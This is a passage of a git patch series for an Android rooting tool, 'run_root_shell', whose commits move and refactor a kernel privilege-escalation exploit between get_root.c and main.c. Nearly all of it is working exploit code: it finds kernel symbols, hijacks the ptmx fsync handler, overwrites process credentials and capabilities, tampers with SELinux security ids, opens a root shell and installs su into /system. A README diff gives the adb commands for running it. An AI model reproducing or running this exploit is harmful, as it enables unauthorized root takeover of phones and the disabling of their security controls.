fb_mem_exploit...\n\n"); + set_fb_mem_exploit_enable(true); + if (!setup_variables()) { + printf("Failed to setup variables.\n"); + exit(EXIT_FAILURE); + } + } + + register_address(); + + exit(EXIT_SUCCESS); +} +/* +vi:ts=2:nowrap:ai:expandtab:sw=2 +*/ + diff --git a/get_root.c b/get_root.c new file mode 100644 index 0000000..181db20 --- /dev/null +++ b/get_root.c @@ -0,0 +1,380 @@ +#include +#include +#include +#include +#include +#include +#define _LARGEFILE64_SOURCE +#include +#include +#include +#include + +#include +#include "device_database.h" +#include "cred.h" +#include "mm.h" +#include "ptmx.h" +#include "libexploit/exploit.h" +#include "libkallsyms/kallsyms_in_memory.h" +#include + +#define THREAD_SIZE 8192 + +#define KERNEL_START 0xc0000000 + +struct thread_info; +struct task_struct; +struct cred; +struct kernel_cap_struct; +struct task_security_struct; +struct list_head; + +struct thread_info { + unsigned long flags; + int preempt_count; + unsigned long addr_limit; + struct task_struct *task; + + /* ... */ +}; + +struct kernel_cap_struct { + unsigned long cap[2]; +}; + +struct cred { + unsigned long usage; + uid_t uid; + gid_t gid; + uid_t suid; + gid_t sgid; + uid_t euid; + gid_t egid; + uid_t fsuid; + gid_t fsgid; + unsigned long securebits; + struct kernel_cap_struct cap_inheritable; + struct kernel_cap_struct cap_permitted; + struct kernel_cap_struct cap_effective; + struct kernel_cap_struct cap_bset; + unsigned char jit_keyring; + void *thread_keyring; + void *request_key_auth; + void *tgcred; + struct task_security_struct *security; + + /* ... */ +}; + +struct list_head { + struct list_head *next; + struct list_head *prev; +}; + +struct task_security_struct { + unsigned long osid; + unsigned long sid; + unsigned long exec_sid; + unsigned long create_sid; + unsigned long keycreate_sid; + unsigned long sockcreate_sid; +}; + + +struct task_struct_partial { + struct list_head cpu_timers[3]; + struct cred *real_cred; + struct cred *cred; + struct cred *replacement_session_keyring; + char comm[16]; +}; + +static inline struct thread_info * +current_thread_info(void) +{ + register unsigned long sp asm ("sp"); + return (struct thread_info *)(sp & ~(THREAD_SIZE - 1)); +} + +static bool +is_cpu_timer_valid(struct list_head *cpu_timer) +{ + if (cpu_timer->next != cpu_timer->prev) { + return false; + } + + if ((unsigned long int)cpu_timer->next < KERNEL_START) { + return false; + } + + return true; +} + +static void +obtain_root_privilege_by_modify_task_cred(void) +{ + struct thread_info *info; + struct cred *cred; + struct task_security_struct *security; + int i; + + info = current_thread_info(); + cred = NULL; + + for (i = 0; i < 0x400; i+= 4) { + struct task_struct_partial *task = ((void *)info->task) + i; + + if (is_cpu_timer_valid(&task->cpu_timers[0]) + && is_cpu_timer_valid(&task->cpu_timers[1]) + && is_cpu_timer_valid(&task->cpu_timers[2]) + && task->real_cred == task->cred) { + cred = task->cred; + break; + } + } + + if (cred == NULL) { + return; + } + + cred->uid = 0; + cred->gid = 0; + cred->suid = 0; + cred->sgid = 0; + cred->euid = 0; + cred->egid = 0; + cred->fsuid = 0; + cred->fsgid = 0; + + cred->cap_inheritable.cap[0] = 0xffffffff; + cred->cap_inheritable.cap[1] = 0xffffffff; + cred->cap_permitted.cap[0] = 0xffffffff; + cred->cap_permitted.cap[1] = 0xffffffff; + cred->cap_effective.cap[0] = 0xffffffff; + cred->cap_effective.cap[1] = 0xffffffff; + cred->cap_bset.cap[0] = 0xffffffff; + cred->cap_bset.cap[1] = 0xffffffff; + + security = cred->security; + if (security) { + if (security->osid != 0 + && security->sid != 0 + && security->exec_sid == 0 + && security->create_sid == 0 + && security->keycreate_sid == 0 + && security->sockcreate_sid == 0) { + security->osid = 1; + security->sid = 1; + } + } +} + +static void +obtain_root_privilege_by_commit_creds(void) +{ + commit_creds(prepare_kernel_cred(0)); +} + +static void (*obtain_root_privilege_func)(void); + +void +obtain_root_privilege(void) +{ + if (obtain_root_privilege_func) { + obtain_root_privilege_func(); + } +} + +static bool +run_obtain_root_privilege(void *user_data) +{ + int fd; + int ret; + + obtain_root_privilege_func = obtain_root_privilege_by_commit_creds; + + fd = open(PTMX_DEVICE, O_WRONLY); + + ret = fsync(fd); + + if (getuid() != 0) { + printf("commit_creds(): failed. Try to hack task->cred.\n"); + + obtain_root_privilege_func = obtain_root_privilege_by_modify_task_cred; + ret = fsync(fd); + } + + close(fd); + + return (ret == 0); +} + +static bool +run_exploit(void) +{ + setup_ptmx_fops_fsync_address(); + if (!ptmx_fops_fsync_address) { + return false; + } + + return attempt_exploit(ptmx_fops_fsync_address, + (unsigned long int)&obtain_root_privilege, 0, + run_obtain_root_privilege, NULL); +} + +static bool +find_ptmx_fops_address(kallsyms *info, void *mem, size_t length) +{ + find_ptmx_fops_hint_t hint; + + hint.ptmx_open_address = kallsyms_in_memory_lookup_name(info, "ptmx_open"); + if (!hint.ptmx_open_address) { + return false; + } + + hint.tty_release_address = kallsyms_in_memory_lookup_name(info, "tty_release"); + if (!hint.tty_release_address) { + return false; + } + + hint.tty_fasync_address = kallsyms_in_memory_lookup_name(info, "tty_fasync"); + if (!hint.tty_fasync_address) { + return false; + } + + return setup_ptmx_fops_address_in_memory(mem, length, &hint); +} + +bool find_variables_in_memory(void *mem, size_t length) +{ + kallsyms *info; + + printf("Search address in memroy...\n"); + + info = kallsyms_in_memory_init(mem, length); + if (info) { + printf("Using kallsyms_in_memroy...\n"); + + if (!prepare_kernel_cred) { + prepare_kernel_cred = (prepare_kernel_cred_t)kallsyms_in_memory_lookup_name(info, "prepare_kernel_cred"); + } + + if (!commit_creds) { + commit_creds = (commit_creds_t)kallsyms_in_memory_lookup_name(info, "commit_creds"); + } + + if (!ptmx_fops) { + ptmx_fops = (void *)kallsyms_in_memory_lookup_name(info, "ptmx_fops"); + + if (!ptmx_fops) { + find_ptmx_fops_address(info, mem, length); + } + } + + kallsyms_in_memory_free(info); + + if (prepare_kernel_cred && commit_creds && ptmx_fops) { + return true; + } + } + + setup_prepare_kernel_cred_address_in_memory(mem, length); + setup_commit_creds_address_in_memory(mem, length); + + return prepare_kernel_cred && commit_creds && ptmx_fops; +} + +bool +setup_variables(void) +{ + setup_prepare_kernel_cred_address(); + setup_commit_creds_address(); + setup_ptmx_fops_address(); + + if (prepare_kernel_cred && commit_creds && ptmx_fops) { + return true; + } + + printf("Try to find address in memory...\n"); + if (!run_with_mmap(find_variables_in_memory)) { + printf("\n"); + run_with_memcpy(find_variables_in_memory); + } + + if (prepare_kernel_cred && commit_creds && ptmx_fops) { + printf(" prepare_kernel_cred = %p\n", prepare_kernel_cred); + printf(" commit_creds = %p\n", commit_creds); + printf(" ptmx_fops = %p\n", ptmx_fops); + +#ifdef HAS_SET_SYMBOL_ADDRESS + device_set_symbol_address(DEVICE_SYMBOL(prepare_kernel_cred), (unsigned long int)prepare_kernel_cred); + device_set_symbol_address(DEVICE_SYMBOL(commit_creds), (unsigned long int)commit_creds); + device_set_symbol_address(DEVICE_SYMBOL(ptmx_fops), (unsigned long int)ptmx_fops); +#endif /* HAS_SET_SYMBOL_ADDRESS */ + + return true; + } + + if (!prepare_kernel_cred) { + printf("Failed to get prepare_kernel_cred address.\n"); + } + + if (!commit_creds) { + printf("Failed to get commit_creds address.\n"); + } + + if (!ptmx_fops) { + printf("Failed to get ptmx_fops address.\n"); + } + + print_reason_device_not_supported(); + + return false; +} + +int +get_root(int argc, char **argv) +{ + char* command = NULL; + int i; + for (i = 1; i < argc; i++) { + if (!strcmp(argv[i], "-c")) { + if (++i < argc) { + command = argv[i]; + } + } + } + + device_detected(); + + if (!setup_variables()) { + printf("Failed to setup variables.\n"); + exit(EXIT_FAILURE); + } + + run_exploit(); + + if (getuid() != 0) { + printf("Failed to obtain root privilege.\n"); + exit(EXIT_FAILURE); + } + + if (command == NULL) { + system("/system/bin/sh"); + } else { + execl("/system/bin/sh", "/system/bin/sh", "-c", command, NULL); + } + + if ((fopen("/data/local/tmp/su", "r")) != NULL){ + system("mount -o rw,remount /system"); + system("cp /data/local/tmp/su /system/xbin"); + system("chmod 644 /system/xbin/su"); + system("mount -o ro,remount /system"); + } + + exit(EXIT_SUCCESS); +} +/* +vi:ts=2:nowrap:ai:expandtab:sw=2 +*/ diff --git a/main.c b/main.c index baab536..2734be1 100644 --- a/main.c +++ b/main.c @@ -19,374 +19,35 @@ #include "libkallsyms/kallsyms_in_memory.h" #include -#define THREAD_SIZE 8192 - -#define KERNEL_START 0xc0000000 - -struct thread_info; -struct task_struct; -struct cred; -struct kernel_cap_struct; -struct task_security_struct; -struct list_head; - -struct thread_info { - unsigned long flags; - int preempt_count; - unsigned long addr_limit; - struct task_struct *task; - - /* ... */ -}; - -struct kernel_cap_struct { - unsigned long cap[2]; -}; - -struct cred { - unsigned long usage; - uid_t uid; - gid_t gid; - uid_t suid; - gid_t sgid; - uid_t euid; - gid_t egid; - uid_t fsuid; - gid_t fsgid; - unsigned long securebits; - struct kernel_cap_struct cap_inheritable; - struct kernel_cap_struct cap_permitted; - struct kernel_cap_struct cap_effective; - struct kernel_cap_struct cap_bset; - unsigned char jit_keyring; - void *thread_keyring; - void *request_key_auth; - void *tgcred; - struct task_security_struct *security; - - /* ... */ -}; - -struct list_head { - struct list_head *next; - struct list_head *prev; -}; - -struct task_security_struct { - unsigned long osid; - unsigned long sid; - unsigned long exec_sid; - unsigned long create_sid; - unsigned long keycreate_sid; - unsigned long sockcreate_sid; -}; - - -struct task_struct_partial { - struct list_head cpu_timers[3]; - struct cred *real_cred; - struct cred *cred; - struct cred *replacement_session_keyring; - char comm[16]; -}; - -static inline struct thread_info * -current_thread_info(void) -{ - register unsigned long sp asm ("sp"); - return (struct thread_info *)(sp & ~(THREAD_SIZE - 1)); -} - -static bool -is_cpu_timer_valid(struct list_head *cpu_timer) -{ - if (cpu_timer->next != cpu_timer->prev) { - return false; - } - - if ((unsigned long int)cpu_timer->next < KERNEL_START) { - return false; - } - - return true; -} - -static void -obtain_root_privilege_by_modify_task_cred(void) -{ - struct thread_info *info; - struct cred *cred; - struct task_security_struct *security; - int i; - - info = current_thread_info(); - cred = NULL; - - for (i = 0; i < 0x400; i+= 4) { - struct task_struct_partial *task = ((void *)info->task) + i; - - if (is_cpu_timer_valid(&task->cpu_timers[0]) - && is_cpu_timer_valid(&task->cpu_timers[1]) - && is_cpu_timer_valid(&task->cpu_timers[2]) - && task->real_cred == task->cred) { - cred = task->cred; - break; - } - } - - if (cred == NULL) { - return; - } - - cred->uid = 0; - cred->gid = 0; - cred->suid = 0; - cred->sgid = 0; - cred->euid = 0; - cred->egid = 0; - cred->fsuid = 0; - cred->fsgid = 0; - - cred->cap_inheritable.cap[0] = 0xffffffff; - cred->cap_inheritable.cap[1] = 0xffffffff; - cred->cap_permitted.cap[0] = 0xffffffff; - cred->cap_permitted.cap[1] = 0xffffffff; - cred->cap_effective.cap[0] = 0xffffffff; - cred->cap_effective.cap[1] = 0xffffffff; - cred->cap_bset.cap[0] = 0xffffffff; - cred->cap_bset.cap[1] = 0xffffffff; - - security = cred->security; - if (security) { - if (security->osid != 0 - && security->sid != 0 - && security->exec_sid == 0 - && security->create_sid == 0 - && security->keycreate_sid == 0 - && security->sockcreate_sid == 0) { - security->osid = 1; - security->sid = 1; - } - } -} - -static void -obtain_root_privilege_by_commit_creds(void) -{ - commit_creds(prepare_kernel_cred(0)); -} - -static void (*obtain_root_privilege_func)(void); - -void -obtain_root_privilege(void) -{ - if (obtain_root_privilege_func) { - obtain_root_privilege_func(); - } -} - -static bool -run_obtain_root_privilege(void *user_data) -{ - int fd; - int ret; - - obtain_root_privilege_func = obtain_root_privilege_by_commit_creds; - - fd = open(PTMX_DEVICE, O_WRONLY); - - ret = fsync(fd); - - if (getuid() != 0) { - printf("commit_creds(): failed. Try to hack task->cred.\n"); - - obtain_root_privilege_func = obtain_root_privilege_by_modify_task_cred; - ret = fsync(fd); - } - - close(fd); - - return (ret == 0); -} - -static bool -run_exploit(void) -{ - setup_ptmx_fops_fsync_address(); - if (!ptmx_fops_fsync_address) { - return false; - } - - return attempt_exploit(ptmx_fops_fsync_address, - (unsigned long int)&obtain_root_privilege, 0, - run_obtain_root_privilege, NULL); +static int print_help(const char* cmd) { + printf("Usage\n"); + printf("> Try privilege escalation:\n"); + printf("%s get_root\n", cmd); + printf("\n"); + printf("> Get symbol address:\n"); + printf("%s get_address\n", cmd); + return 1; } void -device_detected(void) -{ - char device[PROP_VALUE_MAX]; - char build_id[PROP_VALUE_MAX]; - - __system_property_get("ro.product.model", device); - __system_property_get("ro.build.display.id", build_id); - - printf("\n\nDevice detected: %s (%s)\n\n", device, build_id); -} - -static bool -find_ptmx_fops_address(kallsyms *info, void *mem, size_t length) -{ - find_ptmx_fops_hint_t hint; - - hint.ptmx_open_address = kallsyms_in_memory_lookup_name(info, "ptmx_open"); - if (!hint.ptmx_open_address) { - return false; - } - - hint.tty_release_address = kallsyms_in_memory_lookup_name(info, "tty_release"); - if (!hint.tty_release_address) { - return false; - } - - hint.tty_fasync_address = kallsyms_in_memory_lookup_name(info, "tty_fasync"); - if (!hint.tty_fasync_address) { - return false; - } - - return setup_ptmx_fops_address_in_memory(mem, length, &hint); -} - -bool find_variables_in_memory(void *mem, size_t length) -{ - kallsyms *info; - - printf("Search address in memroy...\n"); - - info = kallsyms_in_memory_init(mem, length); - if (info) { - printf("Using kallsyms_in_memroy...\n"); - - if (!prepare_kernel_cred) { - prepare_kernel_cred = (prepare_kernel_cred_t)kallsyms_in_memory_lookup_name(info, "prepare_kernel_cred"); - } - - if (!commit_creds) { - commit_creds = (commit_creds_t)kallsyms_in_memory_lookup_name(info, "commit_creds"); - } - - if (!ptmx_fops) { - ptmx_fops = (void *)kallsyms_in_memory_lookup_name(info, "ptmx_fops"); - - if (!ptmx_fops) { - find_ptmx_fops_address(info, mem, length); - } - } +device_detected(void) { + char device[PROP_VALUE_MAX]; + char build_id[PROP_VALUE_MAX]; - kallsyms_in_memory_free(info); + __system_property_get("ro.product.model", device); + __system_property_get("ro.build.display.id", build_id); - if (prepare_kernel_cred && commit_creds && ptmx_fops) { - return true; - } - } - - setup_prepare_kernel_cred_address_in_memory(mem, length); - setup_commit_creds_address_in_memory(mem, length); - - return prepare_kernel_cred && commit_creds && ptmx_fops; + printf("\n\nDevice detected: %s (%s)\n\n", device, build_id); + return; } -bool -setup_variables(void) -{ - setup_prepare_kernel_cred_address(); - setup_commit_creds_address(); - setup_ptmx_fops_address(); - - if (prepare_kernel_cred && commit_creds && ptmx_fops) { - return true; - } - - printf("Try to find address in memory...\n"); - if (!run_with_mmap(find_variables_in_memory)) { - printf("\n"); - run_with_memcpy(find_variables_in_memory); - } - - if (prepare_kernel_cred && commit_creds && ptmx_fops) { - printf(" prepare_kernel_cred = %p\n", prepare_kernel_cred); - printf(" commit_creds = %p\n", commit_creds); - printf(" ptmx_fops = %p\n", ptmx_fops); - -#ifdef HAS_SET_SYMBOL_ADDRESS - device_set_symbol_address(DEVICE_SYMBOL(prepare_kernel_cred), (unsigned long int)prepare_kernel_cred); - device_set_symbol_address(DEVICE_SYMBOL(commit_creds), (unsigned long int)commit_creds); - device_set_symbol_address(DEVICE_SYMBOL(ptmx_fops), (unsigned long int)ptmx_fops); -#endif /* HAS_SET_SYMBOL_ADDRESS */ - - return true; - } - - if (!prepare_kernel_cred) { - printf("Failed to get prepare_kernel_cred address.\n"); - } +int main(int argc, char **argv) { - if (!commit_creds) { - printf("Failed to get commit_creds address.\n"); - } - - if (!ptmx_fops) { - printf("Failed to get ptmx_fops address.\n"); - } - - print_reason_device_not_supported(); - - return false; -} - -int -main(int argc, char **argv) -{ - char* command = NULL; - int i; - for (i = 1; i < argc; i++) { - if (!strcmp(argv[i], "-c")) { - if (++i < argc) { - command = argv[i]; - } + if (argc == 2 && strcmp(argv[1], "get_root") == 0) { + return get_root(); + } else if (argc == 2 && strcmp(argv[1], "get_address") == 0) { + return get_address(); } - } - - device_detected(); - - if (!setup_variables()) { - printf("Failed to setup variables.\n"); - exit(EXIT_FAILURE); - } - - run_exploit(); - - if (getuid() != 0) { - printf("Failed to obtain root privilege.\n"); - exit(EXIT_FAILURE); - } - - if (command == NULL) { - system("/system/bin/sh"); - } else { - execl("/system/bin/sh", "/system/bin/sh", "-c", command, NULL); - } - - if ((fopen("/data/local/tmp/su", "r")) != NULL){ - system("mount -o rw,remount /system"); - system("cp /data/local/tmp/su /system/xbin"); - system("chmod 644 /system/xbin/su"); - system("mount -o ro,remount /system"); - } - exit(EXIT_SUCCESS); + return print_help(argv[0]); } -/* -vi:ts=2:nowrap:ai:expandtab:sw=2 -*/ From 339e2a49fabd0e12cf844a44baa44cb00388b994 Mon Sep 17 00:00:00 2001 From: scoty755 Date: Sat, 4 Jul 2015 13:03:37 +0900 Subject: [PATCH 20/26] updated readme --- README.md | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/README.md b/README.md index 0463a05..8564aa1 100644 --- a/README.md +++ b/README.md @@ -47,4 +47,8 @@ Running `adb shell chmod 777 /data/local/tmp/*` * Run the command on the phone: - `adb shell /data/local/tmp/run_root_shell` + If the device is not listed in the database, you will need to run this command at the beginning + `adb shell /data/local/tmp/run_root_shell get_address` + + If you try to privilege escalation, you must run this command + `adb shell /data/local/tmp/run_root_shell get_root` From 80a735a77186a1c7ed03639ebaa6fa9752bf34f0 Mon Sep 17 00:00:00 2001 From: scoty755 Date: Sat, 4 Jul 2015 13:18:55 +0900 Subject: [PATCH 21/26] Exits the loop if the acquisition of the Symbol Address failed --- get_address.c | 1 + 1 file changed, 1 insertion(+) diff --git a/get_address.c b/get_address.c index 7906063..6e2a478 100644 --- a/get_address.c +++ b/get_address.c @@ -201,6 +201,7 @@ int get_address(int argc, char **argv) { device_detected(); + has_all_essential_addresses(); printf("Try without fb_mem_exploit fist...\n\n"); set_fb_mem_exploit_enable(false); From 5675581f34f91d9fa7d5868abe99235de69158a2 Mon Sep 17 00:00:00 2001 From: scoty755 Date: Sun, 5 Jul 2015 22:37:24 +0900 Subject: [PATCH 22/26] Revert "Exits the loop if the acquisition of the Symbol Address failed" This reverts commit 80a735a77186a1c7ed03639ebaa6fa9752bf34f0. --- get_address.c | 1 - 1 file changed, 1 deletion(-) diff --git a/get_address.c b/get_address.c index 6e2a478..7906063 100644 --- a/get_address.c +++ b/get_address.c @@ -201,7 +201,6 @@ int get_address(int argc, char **argv) { device_detected(); - has_all_essential_addresses(); printf("Try without fb_mem_exploit fist...\n\n"); set_fb_mem_exploit_enable(false); From 1d2fa33e685e448ae2a84dd27dbbb1e2fbd36747 Mon Sep 17 00:00:00 2001 From: scoty755 Date: Mon, 20 Jul 2015 21:39:56 +0900 Subject: [PATCH 23/26] Update submodule --- libexploit | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/libexploit b/libexploit index 7f1c97f..d936bcc 160000 --- a/libexploit +++ b/libexploit @@ -1 +1 @@ -Subproject commit 7f1c97fa1f85b5a7678fc81ad6f0f81a8322a031 +Subproject commit d936bcc43edf3054a07945326d5fedb393e36c29 From 5ab1afbb65faaf7d8a42d523e6c99413b2bda615 Mon Sep 17 00:00:00 2001 From: scoty755 Date: Fri, 16 Oct 2015 00:53:00 +0900 Subject: [PATCH 24/26] Change the get method of the symbol address --- Android.mk | 1 - get_address.c | 12 +- get_root.c | 380 ------------------------------------------------- main.c | 384 +++++++++++++++++++++++++++++++++++++++++++++++--- 4 files changed, 369 insertions(+), 408 deletions(-) delete mode 100644 get_root.c diff --git a/Android.mk b/Android.mk index 8c474f7..049f757 100644 --- a/Android.mk +++ b/Android.mk @@ -5,7 +5,6 @@ include $(CLEAR_VARS) LOCAL_SRC_FILES := \ cred.c \ get_address.c \ - get_root.c \ kallsyms.c \ main.c \ mm.c \ diff --git a/get_address.c b/get_address.c index 7906063..4e1d4e9 100644 --- a/get_address.c +++ b/get_address.c @@ -164,8 +164,6 @@ setup_variables(void) printf("Failed to get ptmx_fops address.\n"); } - print_reason_device_not_supported(); - return false; } @@ -197,11 +195,9 @@ register_address(void) #endif /* HAS_SET_SYMBOL_ADDRESS */ } -int -get_address(int argc, char **argv) +bool +get_address(void) { - device_detected(); - printf("Try without fb_mem_exploit fist...\n\n"); set_fb_mem_exploit_enable(false); @@ -212,13 +208,13 @@ get_address(int argc, char **argv) set_fb_mem_exploit_enable(true); if (!setup_variables()) { printf("Failed to setup variables.\n"); - exit(EXIT_FAILURE); + return false; } } register_address(); - exit(EXIT_SUCCESS); + return true; } /* vi:ts=2:nowrap:ai:expandtab:sw=2 diff --git a/get_root.c b/get_root.c deleted file mode 100644 index 181db20..0000000 --- a/get_root.c +++ /dev/null @@ -1,380 +0,0 @@ -#include -#include -#include -#include -#include -#include -#define _LARGEFILE64_SOURCE -#include -#include -#include -#include - -#include -#include "device_database.h" -#include "cred.h" -#include "mm.h" -#include "ptmx.h" -#include "libexploit/exploit.h" -#include "libkallsyms/kallsyms_in_memory.h" -#include - -#define THREAD_SIZE 8192 - -#define KERNEL_START 0xc0000000 - -struct thread_info; -struct task_struct; -struct cred; -struct kernel_cap_struct; -struct task_security_struct; -struct list_head; - -struct thread_info { - unsigned long flags; - int preempt_count; - unsigned long addr_limit; - struct task_struct *task; - - /* ... */ -}; - -struct kernel_cap_struct { - unsigned long cap[2]; -}; - -struct cred { - unsigned long usage; - uid_t uid; - gid_t gid; - uid_t suid; - gid_t sgid; - uid_t euid; - gid_t egid; - uid_t fsuid; - gid_t fsgid; - unsigned long securebits; - struct kernel_cap_struct cap_inheritable; - struct kernel_cap_struct cap_permitted; - struct kernel_cap_struct cap_effective; - struct kernel_cap_struct cap_bset; - unsigned char jit_keyring; - void *thread_keyring; - void *request_key_auth; - void *tgcred; - struct task_security_struct *security; - - /* ... */ -}; - -struct list_head { - struct list_head *next; - struct list_head *prev; -}; - -struct task_security_struct { - unsigned long osid; - unsigned long sid; - unsigned long exec_sid; - unsigned long create_sid; - unsigned long keycreate_sid; - unsigned long sockcreate_sid; -}; - - -struct task_struct_partial { - struct list_head cpu_timers[3]; - struct cred *real_cred; - struct cred *cred; - struct cred *replacement_session_keyring; - char comm[16]; -}; - -static inline struct thread_info * -current_thread_info(void) -{ - register unsigned long sp asm ("sp"); - return (struct thread_info *)(sp & ~(THREAD_SIZE - 1)); -} - -static bool -is_cpu_timer_valid(struct list_head *cpu_timer) -{ - if (cpu_timer->next != cpu_timer->prev) { - return false; - } - - if ((unsigned long int)cpu_timer->next < KERNEL_START) { - return false; - } - - return true; -} - -static void -obtain_root_privilege_by_modify_task_cred(void) -{ - struct thread_info *info; - struct cred *cred; - struct task_security_struct *security; - int i; - - info = current_thread_info(); - cred = NULL; - - for (i = 0; i < 0x400; i+= 4) { - struct task_struct_partial *task = ((void *)info->task) + i; - - if (is_cpu_timer_valid(&task->cpu_timers[0]) - && is_cpu_timer_valid(&task->cpu_timers[1]) - && is_cpu_timer_valid(&task->cpu_timers[2]) - && task->real_cred == task->cred) { - cred = task->cred; - break; - } - } - - if (cred == NULL) { - return; - } - - cred->uid = 0; - cred->gid = 0; - cred->suid = 0; - cred->sgid = 0; - cred->euid = 0; - cred->egid = 0; - cred->fsuid = 0; - cred->fsgid = 0; - - cred->cap_inheritable.cap[0] = 0xffffffff; - cred->cap_inheritable.cap[1] = 0xffffffff; - cred->cap_permitted.cap[0] = 0xffffffff; - cred->cap_permitted.cap[1] = 0xffffffff; - cred->cap_effective.cap[0] = 0xffffffff; - cred->cap_effective.cap[1] = 0xffffffff; - cred->cap_bset.cap[0] = 0xffffffff; - cred->cap_bset.cap[1] = 0xffffffff; - - security = cred->security; - if (security) { - if (security->osid != 0 - && security->sid != 0 - && security->exec_sid == 0 - && security->create_sid == 0 - && security->keycreate_sid == 0 - && security->sockcreate_sid == 0) { - security->osid = 1; - security->sid = 1; - } - } -} - -static void -obtain_root_privilege_by_commit_creds(void) -{ - commit_creds(prepare_kernel_cred(0)); -} - -static void (*obtain_root_privilege_func)(void); - -void -obtain_root_privilege(void) -{ - if (obtain_root_privilege_func) { - obtain_root_privilege_func(); - } -} - -static bool -run_obtain_root_privilege(void *user_data) -{ - int fd; - int ret; - - obtain_root_privilege_func = obtain_root_privilege_by_commit_creds; - - fd = open(PTMX_DEVICE, O_WRONLY); - - ret = fsync(fd); - - if (getuid() != 0) { - printf("commit_creds(): failed. Try to hack task->cred.\n"); - - obtain_root_privilege_func = obtain_root_privilege_by_modify_task_cred; - ret = fsync(fd); - } - - close(fd); - - return (ret == 0); -} - -static bool -run_exploit(void) -{ - setup_ptmx_fops_fsync_address(); - if (!ptmx_fops_fsync_address) { - return false; - } - - return attempt_exploit(ptmx_fops_fsync_address, - (unsigned long int)&obtain_root_privilege, 0, - run_obtain_root_privilege, NULL); -} - -static bool -find_ptmx_fops_address(kallsyms *info, void *mem, size_t length) -{ - find_ptmx_fops_hint_t hint; - - hint.ptmx_open_address = kallsyms_in_memory_lookup_name(info, "ptmx_open"); - if (!hint.ptmx_open_address) { - return false; - } - - hint.tty_release_address = kallsyms_in_memory_lookup_name(info, "tty_release"); - if (!hint.tty_release_address) { - return false; - } - - hint.tty_fasync_address = kallsyms_in_memory_lookup_name(info, "tty_fasync"); - if (!hint.tty_fasync_address) { - return false; - } - - return setup_ptmx_fops_address_in_memory(mem, length, &hint); -} - -bool find_variables_in_memory(void *mem, size_t length) -{ - kallsyms *info; - - printf("Search address in memroy...\n"); - - info = kallsyms_in_memory_init(mem, length); - if (info) { - printf("Using kallsyms_in_memroy...\n"); - - if (!prepare_kernel_cred) { - prepare_kernel_cred = (prepare_kernel_cred_t)kallsyms_in_memory_lookup_name(info, "prepare_kernel_cred"); - } - - if (!commit_creds) { - commit_creds = (commit_creds_t)kallsyms_in_memory_lookup_name(info, "commit_creds"); - } - - if (!ptmx_fops) { - ptmx_fops = (void *)kallsyms_in_memory_lookup_name(info, "ptmx_fops"); - - if (!ptmx_fops) { - find_ptmx_fops_address(info, mem, length); - } - } - - kallsyms_in_memory_free(info); - - if (prepare_kernel_cred && commit_creds && ptmx_fops) { - return true; - } - } - - setup_prepare_kernel_cred_address_in_memory(mem, length); - setup_commit_creds_address_in_memory(mem, length); - - return prepare_kernel_cred && commit_creds && ptmx_fops; -} - -bool -setup_variables(void) -{ - setup_prepare_kernel_cred_address(); - setup_commit_creds_address(); - setup_ptmx_fops_address(); - - if (prepare_kernel_cred && commit_creds && ptmx_fops) { - return true; - } - - printf("Try to find address in memory...\n"); - if (!run_with_mmap(find_variables_in_memory)) { - printf("\n"); - run_with_memcpy(find_variables_in_memory); - } - - if (prepare_kernel_cred && commit_creds && ptmx_fops) { - printf(" prepare_kernel_cred = %p\n", prepare_kernel_cred); - printf(" commit_creds = %p\n", commit_creds); - printf(" ptmx_fops = %p\n", ptmx_fops); - -#ifdef HAS_SET_SYMBOL_ADDRESS - device_set_symbol_address(DEVICE_SYMBOL(prepare_kernel_cred), (unsigned long int)prepare_kernel_cred); - device_set_symbol_address(DEVICE_SYMBOL(commit_creds), (unsigned long int)commit_creds); - device_set_symbol_address(DEVICE_SYMBOL(ptmx_fops), (unsigned long int)ptmx_fops); -#endif /* HAS_SET_SYMBOL_ADDRESS */ - - return true; - } - - if (!prepare_kernel_cred) { - printf("Failed to get prepare_kernel_cred address.\n"); - } - - if (!commit_creds) { - printf("Failed to get commit_creds address.\n"); - } - - if (!ptmx_fops) { - printf("Failed to get ptmx_fops address.\n"); - } - - print_reason_device_not_supported(); - - return false; -} - -int -get_root(int argc, char **argv) -{ - char* command = NULL; - int i; - for (i = 1; i < argc; i++) { - if (!strcmp(argv[i], "-c")) { - if (++i < argc) { - command = argv[i]; - } - } - } - - device_detected(); - - if (!setup_variables()) { - printf("Failed to setup variables.\n"); - exit(EXIT_FAILURE); - } - - run_exploit(); - - if (getuid() != 0) { - printf("Failed to obtain root privilege.\n"); - exit(EXIT_FAILURE); - } - - if (command == NULL) { - system("/system/bin/sh"); - } else { - execl("/system/bin/sh", "/system/bin/sh", "-c", command, NULL); - } - - if ((fopen("/data/local/tmp/su", "r")) != NULL){ - system("mount -o rw,remount /system"); - system("cp /data/local/tmp/su /system/xbin"); - system("chmod 644 /system/xbin/su"); - system("mount -o ro,remount /system"); - } - - exit(EXIT_SUCCESS); -} -/* -vi:ts=2:nowrap:ai:expandtab:sw=2 -*/ diff --git a/main.c b/main.c index 2734be1..b4b09ad 100644 --- a/main.c +++ b/main.c @@ -17,37 +17,383 @@ #include "ptmx.h" #include "libexploit/exploit.h" #include "libkallsyms/kallsyms_in_memory.h" -#include -static int print_help(const char* cmd) { - printf("Usage\n"); - printf("> Try privilege escalation:\n"); - printf("%s get_root\n", cmd); - printf("\n"); - printf("> Get symbol address:\n"); - printf("%s get_address\n", cmd); - return 1; +#define THREAD_SIZE 8192 + +#define KERNEL_START 0xc0000000 + +struct thread_info; +struct task_struct; +struct cred; +struct kernel_cap_struct; +struct task_security_struct; +struct list_head; + +struct thread_info { + unsigned long flags; + int preempt_count; + unsigned long addr_limit; + struct task_struct *task; + + /* ... */ +}; + +struct kernel_cap_struct { + unsigned long cap[2]; +}; + +struct cred { + unsigned long usage; + uid_t uid; + gid_t gid; + uid_t suid; + gid_t sgid; + uid_t euid; + gid_t egid; + uid_t fsuid; + gid_t fsgid; + unsigned long securebits; + struct kernel_cap_struct cap_inheritable; + struct kernel_cap_struct cap_permitted; + struct kernel_cap_struct cap_effective; + struct kernel_cap_struct cap_bset; + unsigned char jit_keyring; + void *thread_keyring; + void *request_key_auth; + void *tgcred; + struct task_security_struct *security; + + /* ... */ +}; + +struct list_head { + struct list_head *next; + struct list_head *prev; +}; + +struct task_security_struct { + unsigned long osid; + unsigned long sid; + unsigned long exec_sid; + unsigned long create_sid; + unsigned long keycreate_sid; + unsigned long sockcreate_sid; +}; + + +struct task_struct_partial { + struct list_head cpu_timers[3]; + struct cred *real_cred; + struct cred *cred; 